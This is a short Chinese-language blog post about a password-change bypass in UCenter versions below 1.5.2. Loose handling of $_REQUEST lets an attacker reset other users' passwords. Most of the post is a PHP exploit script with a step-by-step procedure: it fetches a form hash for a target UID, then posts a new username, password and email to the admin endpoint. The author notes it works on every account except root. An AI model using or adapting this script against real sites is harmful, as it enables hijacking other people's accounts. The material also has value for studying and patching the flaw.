關於UCenter 1.5.2 版以下的一個修改用戶密碼bug

    當使用$_REQUEST全局變量接收數據時,PHP優先接收通過POST提交的數據, 由於這個原因UCenter過濾不嚴謹導致修改用戶密碼模塊被繞過,現在通過一個簡單的例子來說明,繞過的方法,可以PHP程序或HTML來實現,這裏我用PHP來說明:

fSocket類: http://blog.csdn.net/jun54555/archive/2010/11/15/6010873.aspx

通過在前臺獲取用戶的UID, 將其寫入數組變量 $data中, 然後註釋掉後五項, 然後

第一次運行:以獲取表單的驗證串:formhash以及用戶相關信息,

第二次運行:去除數組變量 $data的元素註釋,將用戶要修改的信息和密碼寫入數組變量 $data中, 以修改用戶密碼

 

注:除了uid是root外, 其他任何用戶都可以生效!

 $f = new fSocket; $http_header =array( 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language: zh-cn,zh;q=0.5", "Accept-Encoding: gzip,deflate", "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7", "Keep-Alive: 115", "Connection: keep-alive", ); ######################### 登錄驗證 ################################## $data = array( 'uid' => '100035', 'a' => 'edit', //'formhash' => '673a2898c3b7d6d5', //'newusername' => 'cy', //'username' => 'ct', // 'password' => '04011217', // 'email' => 'jun54555@gmail.com' ); $option = array( 'ssl_enable' => false, 'ssl_verifypeer' => false, //依賴於ssl_enable 'http_header' => $http_header, 'cookie_enable' => true, 'cookiefile' => true, //依賴於cookie_enable 'cookiejar' => true, //依賴於cookie_enable //'referer' => "http://www.phpchina.com/", 'header' => false, 'returntransfer' => true, 'cookie_save_file'=> false, 'follow_location' => true, ); header("Content-Encoding: gzip"); $response = $f->send("http://www.xxx.org/uc_server//admin.php?m=user&a=login", "", $data, $option); //ucenter的後臺地址 echo $response;